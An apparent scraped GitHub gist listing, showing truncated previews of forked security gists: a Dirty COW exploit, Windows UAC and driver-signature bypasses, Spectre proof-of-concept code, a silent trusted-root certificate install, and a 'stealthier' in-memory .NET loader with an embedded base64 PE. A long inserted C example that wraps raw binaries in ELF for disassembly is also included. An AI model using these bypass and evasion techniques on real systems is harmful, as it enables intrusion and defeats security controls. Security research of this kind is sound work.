@kernullist
kernullist / naughtyc0w.c
Created October 27, 2016 00:52 — forked from mak/naughtyc0w.c
exploit for CVE-2016-5195 nothing fancy
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@kernullist
kernullist / bin2elf.sh
Created February 20, 2017 01:20 — forked from tangrs/bin2elf.sh
Convert a memory dump/raw binary image into an ELF file
#!/bin/sh
# Convert a raw binary image into an ELF file suitable for loading into a disassembler
cat > raw$$.ld <<EOF
SECTIONS
{
EOF
echo " . = $3;" >> raw$$.ld
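As an added example (not the gist's own script, which drives `ld` with a generated linker script), the same wrapping done directly in C. It emits an ELF64 executable whose single PT_LOAD segment and `.text` section carry the raw image at the requested load address, so objdump, IDA or Ghidra disassemble it with correct addresses instead of offset 0; it also reads the header back and bounds-checks the segment before trusting it, which is the check you want before feeding an untrusted dump to tooling. Assumptions: Linux `<elf.h>`, little-endian ELF64, x86-64 by default (pass another `EM_*` value for other targets), the function names `build_elf_image`, `read_load_segment` and `selftest_roundtrip` are chosen here, and the six sample bytes are a constructed x86-64 stub, not data from the page.

```c
/* Added example: wrap a raw binary image in a minimal ELF64 so a disassembler
 * knows its load address. Not the gist's script; helper names are hypothetical.
 * Assumes Linux <elf.h> and little-endian ELF64; machine type is a parameter. */
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* File layout: [Ehdr][Phdr][pad to BLOB_OFF][raw image][.shstrtab][pad to 8][3 Shdr] */
enum { BLOB_OFF = 0x80 };
static const char SHSTR[] = "\0.text\0.shstrtab";  /* name offsets: 1 = .text, 7 = .shstrtab */

/* Builds the whole ELF image in memory. Returns its size (0 on failure);
 * *out receives a malloc'd buffer the caller frees. */
size_t build_elf_image(const uint8_t *blob, size_t len, uint64_t base,
                       uint16_t machine, uint8_t **out)
{
    if (len == 0) return 0;
    size_t str_off = BLOB_OFF + len;
    size_t sh_off  = (str_off + sizeof SHSTR + 7) & ~(size_t)7;
    size_t total   = sh_off + 3 * sizeof(Elf64_Shdr);
    uint8_t *img = calloc(1, total);
    if (!img) return 0;

    Elf64_Ehdr *eh = (Elf64_Ehdr *)img;
    memcpy(eh->e_ident, ELFMAG, SELFMAG);
    eh->e_ident[EI_CLASS] = ELFCLASS64;  eh->e_ident[EI_DATA] = ELFDATA2LSB;
    eh->e_ident[EI_VERSION] = EV_CURRENT;
    eh->e_type = ET_EXEC;  eh->e_machine = machine;  eh->e_version = EV_CURRENT;
    eh->e_entry = base;                           /* entry = image start, like the gist's "." */
    eh->e_phoff = sizeof(Elf64_Ehdr);  eh->e_phentsize = sizeof(Elf64_Phdr);  eh->e_phnum = 1;
    eh->e_shoff = sh_off;              eh->e_shentsize = sizeof(Elf64_Shdr);  eh->e_shnum = 3;
    eh->e_ehsize = sizeof(Elf64_Ehdr); eh->e_shstrndx = 2;

    /* One PT_LOAD segment: the raw bytes, mapped R+X at the requested base. */
    Elf64_Phdr *ph = (Elf64_Phdr *)(img + eh->e_phoff);
    ph->p_type = PT_LOAD;  ph->p_flags = PF_R | PF_X;
    ph->p_offset = BLOB_OFF;  ph->p_vaddr = ph->p_paddr = base;
    ph->p_filesz = ph->p_memsz = len;  ph->p_align = 1;

    memcpy(img + BLOB_OFF, blob, len);
    memcpy(img + str_off, SHSTR, sizeof SHSTR);

    /* Section headers: objdump -d wants a .text section, not just the segment.
     * sh[0] stays zeroed (the mandatory SHN_UNDEF entry). */
    Elf64_Shdr *sh = (Elf64_Shdr *)(img + sh_off);
    sh[1].sh_name = 1;  sh[1].sh_type = SHT_PROGBITS;  sh[1].sh_flags = SHF_ALLOC | SHF_EXECINSTR;
    sh[1].sh_addr = base;  sh[1].sh_offset = BLOB_OFF;  sh[1].sh_size = len;  sh[1].sh_addralign = 1;
    sh[2].sh_name = 7;  sh[2].sh_type = SHT_STRTAB;
    sh[2].sh_offset = str_off;  sh[2].sh_size = sizeof SHSTR;  sh[2].sh_addralign = 1;

    *out = img;
    return total;
}

/* Reads base and size of the first PT_LOAD segment. Returns 0 unless the image
 * is ELF64 and the segment lies entirely inside the n bytes supplied. */
int read_load_segment(const uint8_t *img, size_t n, uint64_t *base, uint64_t *len)
{
    if (n < sizeof(Elf64_Ehdr) || memcmp(img, ELFMAG, SELFMAG) != 0) return 0;
    const Elf64_Ehdr *eh = (const Elf64_Ehdr *)img;
    if (eh->e_ident[EI_CLASS] != ELFCLASS64) return 0;
    for (unsigned i = 0; i < eh->e_phnum; i++) {
        size_t off = eh->e_phoff + (size_t)i * eh->e_phentsize;
        if (off + sizeof(Elf64_Phdr) > n) return 0;
        const Elf64_Phdr *ph = (const Elf64_Phdr *)(img + off);
        if (ph->p_type != PT_LOAD) continue;
        if (ph->p_offset > n || ph->p_filesz > n - ph->p_offset) return 0;  /* truncated file */
        *base = ph->p_vaddr;  *len = ph->p_filesz;
        return 1;
    }
    return 0;
}

/* Constructed sample, x86-64: push rbp; mov rbp,rsp; pop rbp; ret */
static const uint8_t SAMPLE[] = {0x55, 0x48, 0x89, 0xe5, 0x5d, 0xc3};

/* Round trip on the sample; returns the image size on success, 0 on failure. */
size_t selftest_roundtrip(void)
{
    uint8_t *img = NULL;
    uint64_t base = 0, len = 0;
    size_t n = build_elf_image(SAMPLE, sizeof SAMPLE, 0x400000, EM_X86_64, &img);
    int ok = n && read_load_segment(img, n, &base, &len)
             && base == 0x400000 && len == sizeof SAMPLE
             && memcmp(img + BLOB_OFF, SAMPLE, sizeof SAMPLE) == 0
             && read_load_segment(img, BLOB_OFF + 3, &base, &len) == 0;  /* truncation is rejected */
    free(img);
    return ok ? n : 0;
}

/* Same argument order as the gist: raw.bin out.elf load_address */
int main(int argc, char **argv)
{
    if (argc != 4) { fprintf(stderr, "usage: %s raw.bin out.elf load_addr\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror(argv[1]); return 1; }
    fseek(f, 0, SEEK_END);  long sz = ftell(f);  rewind(f);
    uint8_t *blob = sz > 0 ? malloc((size_t)sz) : NULL;
    if (!blob || fread(blob, 1, (size_t)sz, f) != (size_t)sz) { fprintf(stderr, "read failed\n"); return 1; }
    fclose(f);
    uint8_t *img = NULL;
    size_t n = build_elf_image(blob, (size_t)sz, strtoull(argv[3], NULL, 0), EM_X86_64, &img);
    FILE *o = n ? fopen(argv[2], "wb") : NULL;
    if (!o || fwrite(img, 1, n, o) != n) { fprintf(stderr, "write failed\n"); return 1; }
    fclose(o);  free(img);  free(blob);
    return 0;
}
```

`./bin2elf dump.bin dump.elf 0x08000000` then `objdump -d dump.elf` shows the code at 0x08000000. The sections are what `objdump` keys on; IDA and Ghidra are happy with the program header alone, but emitting both costs a few bytes and avoids a second tool-specific pass.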
@kernullist
kernullist / main.c
Created July 21, 2017 01:55 — forked from hfiref0x/main.c
NtLoadEnclaveData Windows 10 RS3 DSE bypass
#include "global.h"
HINSTANCE g_hInstance;
HANDLE g_ConOut = NULL;
BOOL g_ConsoleOutput = FALSE;
WCHAR g_BE = 0xFEFF;
RTL_OSVERSIONINFOW g_osv;
#define CI_DLL "ci.dll"
@kernullist
kernullist / spectre.c
Created January 5, 2018 08:21 — forked from Badel2/spectre.c
Spectre attack example implementation
/* https://spectreattack.com/spectre.pdf */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

Spectre still unfixed, unlike what Intel says

Written by https://twitter.com/never_released , reviewed and corrected by Alex Ionescu

On January 4th, 3 separate vulnerabilities were released, the first two being named Spectre (Variant 1 and 2) and the third one being Meltdown (Variant 3).

Intel CPUs are affected by all vulnerabilities, as are Apple A-series CPUs used on iOS devices, nVidia Tegra X2, the ARM Cortex-A75 and the Qualcomm Snapdragon 845 CPUs. CPUs with speculative execution from other manufacturers (other ARM "big" cores, AMD CPUs, PowerPC, ...) are affected by Spectre but not Meltdown.

In-order CPUs (such as ARM Cortex-A7 or ARM Cortex-A53, as well as Intel Atoms from before 2013) are not affected by Meltdown and Spectre.

@kernullist
kernullist / spectre.c
Created January 8, 2018 04:54 — forked from ErikAugust/spectre.c
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@kernullist
kernullist / script.ps1
Created January 24, 2018 04:41
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
#Verify Not Present
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
#Import-Certificate
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
#Prompted
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99
@kernullist
kernullist / sync-projects
Created February 6, 2018 08:55 — forked from JonasGroeger/sync-projects
Gitlab: Clone / Pull all projects in a group
#!/usr/bin/env bash
# Documentation
# https://docs.gitlab.com/ce/api/projects.html#list-projects
NAMESPACE="YOUR_NAMESPACE"
BASE_PATH="https://gitlab.example.com/"
PROJECT_SEARCH_PARAM=""
PROJECT_SELECTION="select(.namespace.name == \"$NAMESPACE\")"
PROJECT_PROJECTION="{ \"path\": .path, \"git\": .ssh_url_to_repo }"
@kernullist
kernullist / LoadInMemoryModule.ps1
Created April 3, 2018 01:22 — forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA